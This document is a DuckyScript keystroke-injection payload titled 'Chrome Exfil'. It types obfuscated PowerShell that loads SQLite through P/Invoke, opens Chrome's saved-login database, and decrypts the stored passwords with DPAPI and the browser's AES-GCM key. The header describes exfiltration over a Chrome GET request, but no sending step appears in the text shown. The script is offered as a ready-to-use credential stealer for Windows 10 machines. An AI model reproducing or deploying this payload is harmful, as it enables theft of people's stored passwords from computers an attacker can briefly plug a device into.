REM Title: Chrome Exfil
REM Author: Robert Wallhead
REM Description: Opens hidden powershell, grabs Chrome passwords, exfils via Chrome GET request.
REM Target: Windows 10 (Powershell + Chrome)
REM Version: 1.0
REM Category: Exfiltration
DELAY 5000
GUI r
DELAY 250
STRING powershell
ENTER
DELAY 2500
STRING pwsh
ENTER
DELAY 2500
STRING $d=Add-Type -A System.Security
STRING $p='public static'
STRING $g=""")]$p extern"
STRING $i='[DllImport("winsqlite3",EntryPoint="sqlite3_'
STRING $m="[MarshalAs(UnmanagedType.LP"
STRING $q='(s,i)'
STRING $f='(p s,int i)'
STRING $z=$env:LOCALAPPDATA+'\Google\Chrome\User Data'
STRING $u=[Security.Cryptography.ProtectedData]
STRING Add-Type "using System.Runtime.InteropServices;using p=System.IntPtr;$p class W{$($i)open$g p O($($m)Str)]string f,out p d);$($i)prepare16_v2$g p P(p d,$($m)WStr)]string l,int n,out p s,p t);$($i)step$g p S(p s);$($i)column_text16$g p C$f;$($i)column_bytes$g int Y$f;$($i)column_blob$g p L$f;$p string T$f{return Marshal.PtrToStringUni(C$q);}$p byte[] B$f{var r=new byte[Y$q];Marshal.Copy(L$q,r,0,Y$q);return r;}}"
STRING $s=[W]::O("$z\\Default\\Login Data",[ref]$d)
STRING $t={($args[0]|%{[char]$_})-join''}
STRING if($host.Version-like"7*"){$b=(gc "$z\\Local State"|ConvertFrom-Json).os_crypt.encrypted_key
STRING $x=[Security.Cryptography.AesGcm]::New($u::Unprotect([System.Convert]::FromBase64String($b)[5..($b.length-1)],$n,0))}$_=[W]::P($d,"SELECT*FROM logins WHERE blacklisted_by_user=0",-1,[ref]$s,0)
STRING for(;!([W]::S($s)%100)){[W]::T($s,0)
STRING [W]::T($s,3)
STRING $c=[W]::B($s,5)
STRING try{.$t $u::Unprotect($c,$n,0)}catch{if($x){$k=$c.length
STRING $e=[byte[]]::new($k-31)
STRING $x.Decrypt($c[3..14],$c[15..($k-17)],$c[($k-16)..($k-1)],$e)
STRING .$t $e}}}
ENTER
